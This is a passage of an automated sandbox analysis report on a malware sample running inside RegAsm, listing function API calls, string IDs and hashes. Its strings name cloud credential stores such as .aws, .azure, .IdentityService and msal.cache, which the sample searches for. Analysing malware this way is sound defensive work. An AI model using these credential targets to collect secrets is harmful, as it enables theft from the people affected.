                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$memset$Findwsprintf$FilePath$CloseFirstFolderMatchNextSpec
                                                    • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                    • API String ID: 2615841231-3645552435
                                                    • Opcode ID: c9212e5bd4e93b1b70415a919767144b0d01044981f7da6fa5772f24a78b3fc4
                                                    • Instruction ID: 1dd8a78ca5992b47dd81bcaa515727beb3a1476bc257dfe9c218185c4bfeef7c
                                                    • Opcode Fuzzy Hash: c9212e5bd4e93b1b70415a919767144b0d01044981f7da6fa5772f24a78b3fc4
                                                    • Instruction Fuzzy Hash: 904165B6A44228ABDF00EBB1EC47FC977AC5B64704F500067B649E60D0EEB896C48B65
                                                    Function 0040B04C Relevance: 28.9, APIs: 19, Instructions: 377stringmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 00412D64: GetSystemTime.KERNEL32(00000000,00425200), ref: 00412D8A
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040B277
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040B27E
                                                    • lstrcatA.KERNEL32(?,00000000,00428E58,00428E58,00000000), ref: 0040B3A4
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 0040B3B2
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040B3C4
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 0040B3D2
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040B3E4
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 0040B3F2
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 0040B412
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040B424
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 0040B432
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040B444
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 0040B452
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040B464
                                                    • lstrcatA.KERNEL32(?,00428E48), ref: 0040B472
                                                    • lstrlenA.KERNEL32(?), ref: 0040B4BF
                                                    • lstrlenA.KERNEL32(?), ref: 0040B4CD
                                                      • Part of subcall function 00418DB9: _MSFOpenExW.MSPDB140-MSVCRT ref: 00418E6C
                                                      • Part of subcall function 00418DB9: CreateThread.KERNEL32(00000000,00000000,00418C65,?,00000000,00000000), ref: 00418E85
                                                      • Part of subcall function 00418DB9: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00418E96
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040B404
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 004135B9: memset.MSVCRT ref: 004135D4
                                                      • Part of subcall function 004135B9: OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041368A
                                                      • Part of subcall function 004135B9: TerminateProcess.KERNEL32(00000000,00000000), ref: 004136A7
                                                      • Part of subcall function 004135B9: CloseHandle.KERNEL32(00000000), ref: 004136B3
                                                      • Part of subcall function 00411715: lstrlenA.KERNEL32(?,?,?,00419018,00425200,00425200,?,?,?,0041ABB6), ref: 0041171F
                                                      • Part of subcall function 00411715: lstrcpyA.KERNEL32(0041ABB6,00000000,?,00419018,00425200,00425200), ref: 0041176D
                                                    • memset.MSVCRT ref: 0040B518
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$lstrcpy$lstrlen$Process$HeapOpenmemset$AllocCloseCreateHandleObjectSingleSystemTerminateThreadTimeWait
                                                    • String ID:
                                                    • API String ID: 1071764044-0
                                                    • Opcode ID: fa250544dc97d75aede4d3142a785a3f47aebc49b560d234d34461475db5f5ce
                                                    • Instruction ID: 6bcecfaba4de89f08d2b33528e6d3ad2465a3a73166f70e19fa6e2e5cb51743f
                                                    • Opcode Fuzzy Hash: fa250544dc97d75aede4d3142a785a3f47aebc49b560d234d34461475db5f5ce
                                                    • Instruction Fuzzy Hash: 23E12F72900208AFDB05EBA1EC56EED7B79EF15305F10506AF216B10F1EF395A89CB58
                                                    Function 1FB45D70 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 266COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: automerge$crisismerge$deletemerge$hashsize$pgsz$rank$secure-delete$usermerge
                                                    • API String ID: 0-3330941169
                                                    • Opcode ID: 7284075bb40d7789c68c41f6a2455cc4b625cc5e7ddbe5d654d91e58fe07c7e6
                                                    • Instruction ID: f6e7df0e0e4caac7301e4d777cf9c3997f17eb0c50a8893d28e55a63f810fd6c
                                                    • Opcode Fuzzy Hash: 7284075bb40d7789c68c41f6a2455cc4b625cc5e7ddbe5d654d91e58fe07c7e6
                                                    • Instruction Fuzzy Hash: 5F7128BAB007115BC7059A59BE4064EB7D1EFC1212F2408B9FD03C7351EB29F95A97A3
                                                    Function 0041F930 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 86stringCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrlenA.KERNEL32(?,?,?,00420A84,?), ref: 0041F937
                                                    • StrCmpCA.SHLWAPI(?,0042AA34,?,?,00420A84,?), ref: 0041F981
                                                    • StrCmpCA.SHLWAPI(?,.zip,?,?,00420A84,?), ref: 0041F99A
                                                    • StrCmpCA.SHLWAPI(?,.zoo,?,?,00420A84,?), ref: 0041F9B3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrlen
                                                    • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                    • API String ID: 1659193697-51310709
                                                    • Opcode ID: 3224264fa3be61d7cd4551fc1dba197681315500aa232dff3bd41d36febbc101
                                                    • Instruction ID: 6b8320d09f5c7083ee15ac42653dfd6e115afcb84605d9c9dd3679c1fa820a61
                                                    • Opcode Fuzzy Hash: 3224264fa3be61d7cd4551fc1dba197681315500aa232dff3bd41d36febbc101
                                                    • Instruction Fuzzy Hash: 5531FB74B44104FBCF10EF61DE45BEE7BB5AF217887604073E445A6220D37D9EA7AA0A
                                                    Function 1FA35E20 Relevance: 26.7, APIs: 8, Strings: 7, Instructions: 496COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id'$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such fts5 table: %s.%s$recursive definition for %s.%s
                                                    • API String ID: 0-1070437968
                                                    • Opcode ID: d88ac5857dd34f427639e150071d6eb4d35fb5622b58dac6626d689bea23165d
                                                    • Instruction ID: 88fdb74ddddcedf4a3408a6f83456db82a8c93aea6a002cf56ef0373ac52e8d9
                                                    • Opcode Fuzzy Hash: d88ac5857dd34f427639e150071d6eb4d35fb5622b58dac6626d689bea23165d
                                                    • Instruction Fuzzy Hash: 1102D0B4E047429FD7108F24DC84F9B77E4AF84316F044568E9899B342EB7EF5548BA2
                                                    Function 00414AB5 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 317stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • strtok_s.MSVCRT ref: 00414AEC
                                                    • lstrcpyA.KERNEL32(?,00000000,?,00000104,?,00000104,00000104,?,00000104), ref: 00414BE0
                                                      • Part of subcall function 00412F92: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00412FBC
                                                      • Part of subcall function 004133A2: StrStrA.SHLWAPI(?,?,?,?,00414C10,?,00000000), ref: 004133AC
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00414C1B
                                                      • Part of subcall function 004133A2: lstrcpyn.KERNEL32(00640E18,?,?), ref: 004133CF
                                                      • Part of subcall function 004133A2: lstrlenA.KERNEL32(?), ref: 004133E5
                                                      • Part of subcall function 004133A2: wsprintfA.USER32 ref: 00413403
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00414C61
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00414CA7
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00414CED
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00414D33
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00414D79
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00414DBF
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00414E05
                                                      • Part of subcall function 00411715: lstrlenA.KERNEL32(?,?,?,00419018,00425200,00425200,?,?,?,0041ABB6), ref: 0041171F
                                                      • Part of subcall function 00411715: lstrcpyA.KERNEL32(0041ABB6,00000000,?,00419018,00425200,00425200), ref: 0041176D
                                                    • strtok_s.MSVCRT ref: 00414F62
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlenstrtok_s$FolderPathlstrcpynwsprintf
                                                    • String ID: false$true
                                                    • API String ID: 434863430-2658103896
                                                    • Opcode ID: 765c5d36a3a43330fc645abf35fb1820cb1d19ba016c45abc62f6d521b063b6a
                                                    • Instruction ID: 11c32ebd37ec89fc3e90f9bc277b4c1bec05cf9b0dada0b33f80a2abde32543e
                                                    • Opcode Fuzzy Hash: 765c5d36a3a43330fc645abf35fb1820cb1d19ba016c45abc62f6d521b063b6a
                                                    • Instruction Fuzzy Hash: F8D16CB190422DAFDF14EF64DC89ED973B8BB14308F00059AF519E6161EB389AC9CF58
                                                    Function 00414F8C Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 151stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcessstrtok_s
                                                    • String ID: block
                                                    • API String ID: 3407564107-2199623458
                                                    • Opcode ID: b27fb4b0cd0599404b7641d4c3026fdea6b6175c9d5b5fbf1cac4d7974c87707
                                                    • Instruction ID: d70f04a8b6de591f0040fb7af7f12beae7af2c4fee756315f502bbbdee6ae6db
                                                    • Opcode Fuzzy Hash: b27fb4b0cd0599404b7641d4c3026fdea6b6175c9d5b5fbf1cac4d7974c87707
                                                    • Instruction Fuzzy Hash: E8513570A40209FFCB11EF90E844BDE3BB5AF54349F20415AE801AB261E779CAD1CF1A
                                                    Function 1FAA9980 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 429COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such function: %s
                                                    • API String ID: 0-3900766660
                                                    • Opcode ID: b76bc822d470947b4aac9b1fe974777dd0d9edbdcd23a928d6da77299a7a1822
                                                    • Instruction ID: b0141ee1afadfc70a5a7f501d38f42731827ad77a0625cd59ce23f80b012cb5c
                                                    • Opcode Fuzzy Hash: b76bc822d470947b4aac9b1fe974777dd0d9edbdcd23a928d6da77299a7a1822
                                                    • Instruction Fuzzy Hash: 47E1C4B8A047419BD710CF25DC80B9B77E9AF88714F04452DE95A9B242E73FF849C7A2
                                                    Function 1FA63800 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 184COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$cannot open value of type %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$integer$misuse$no such rowid: %lld$null$real
                                                    • API String ID: 0-1477268580
                                                    • Opcode ID: 5f04eb71aeb960060d4cf0bf3adfdbde86e0f4332827150870b27f453b1f6321
                                                    • Instruction ID: 7277848b02fa97367b4445202eea946fce0ce08edf053eb40c5f4428f9e84b8b
                                                    • Opcode Fuzzy Hash: 5f04eb71aeb960060d4cf0bf3adfdbde86e0f4332827150870b27f453b1f6321
                                                    • Instruction Fuzzy Hash: 2251DFB9A043019FD7108F28DC80A56B7E4FF84325F04496DEA568B742EB7EF8159BA1
                                                    Function 1FB4F370 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 196COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
